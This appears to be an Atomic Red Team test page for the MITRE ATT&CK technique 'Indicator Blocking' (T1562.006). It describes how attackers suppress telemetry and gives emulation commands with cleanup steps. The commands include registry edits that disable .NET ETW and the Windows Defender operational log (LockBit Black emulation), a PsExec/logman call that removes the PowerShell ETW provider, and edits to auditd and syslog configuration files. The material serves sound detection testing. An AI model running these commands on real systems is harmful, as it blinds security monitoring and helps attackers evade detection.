An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). For example, adversaries may modify the `File` value inHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security
to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging) ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001)Set-EtwTraceProvider
cmdlet or by interfacing directly with the Registry to make alterations. In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).
Atomic Test #1 - Auditing Configuration Changes on Linux Host
Atomic Test #2 - Auditing Configuration Changes on FreeBSD Host
Atomic Test #3 - Logging Configuration Changes on Linux Host
Atomic Test #4 - Logging Configuration Changes on FreeBSD Host
Atomic Test #6 - Disable .NET Event Tracing for Windows Via Registry (cmd)
Atomic Test #7 - Disable .NET Event Tracing for Windows Via Registry (powershell)
Atomic Test #8 - LockBit Black - Disable the ETW Provider of Windows Defender -cmd
Atomic Test #9 - LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
Emulates modification of auditd configuration files
Supported Platforms: Linux
auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
| Name | Description | Type | Default Value | |——|————-|——|—————| | audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf| | auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf| | libaudit_config_file_name | The name of the libaudit configuration file to be changed | string | libaudit.conf|
1
bash
! Elevation Required (e.g. root or admin)1
2
3
4
5
6
sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
1
2
3
4
5
6
sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ d' /etc/#{auditd_config_file_name}
else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ d' /etc/#{libaudit_config_file_name}
Emulates modification of auditd configuration files
Supported Platforms: Linux
auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd
| Name | Description | Type | Default Value | |——|————-|——|—————| | auditd_config_file_name | The name of the auditd configuration file to be changed | string | audit_event|
1
sh
! Elevation Required (e.g. root or admin)1
echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
1
sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
Emulates modification of syslog configuration.
Supported Platforms: Linux
auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
| Name | Description | Type | Default Value | |——|————-|——|—————| | syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf| | rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf| | syslog_ng_config_file_name | The name of the syslog-ng configuration file to be changed | string | syslog-ng.conf|
1
bash
! Elevation Required (e.g. root or admin)1
2
3
4
5
6
7
8
9
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
1
2
3
4
5
6
7
8
9
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ d' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ d' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
Emulates modification of syslog configuration.
Supported Platforms: Linux
auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8
| Name | Description | Type | Default Value | |——|————-|——|—————| | syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
1
sh
! Elevation Required (e.g. root or admin)1
2
3
if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fi
1
2
3
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
fi
This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
Supported Platforms: Windows
auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84
| Name | Description | Type | Default Value | |——|————-|——|—————| | ps_exec_location | Location of PSExec. | string | PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe| | session | The session to disable. | string | EventLog-Application| | provider | The provider to disable. | string | Microsoft-Windows-Powershell|
1
powershell
! Elevation Required (e.g. root or admin)1
cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
1
cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
1
powershell
!1
if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
1
2
3
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
Supported Platforms: Windows
auto_generated_guid: 8a4c33be-a0d3-434a-bee6-315405edbd5b
1
command_prompt
! Elevation Required (e.g. root or admin)REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
Disables ETW for the .NET Framework using PowerShell to update the Windows registry
Supported Platforms: Windows
auto_generated_guid: 19c07a45-452d-4620-90ed-4c34fffbe758
1
powershell
! Elevation Required (e.g. root or admin)1
New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
1
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
An adversary can disable the ETW Provider of Windows Defender, so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
Supported Platforms: Windows
auto_generated_guid: f6df0b8e-2c83-44c7-ba5e-0fa4386bec41
1
command_prompt
! Elevation Required (e.g. root or admin)reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
An adversary can disable the ETW Provider of Windows Defender, so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
Supported Platforms: Windows
auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02
1
powershell
! Elevation Required (e.g. root or admin)1
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force
1
Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore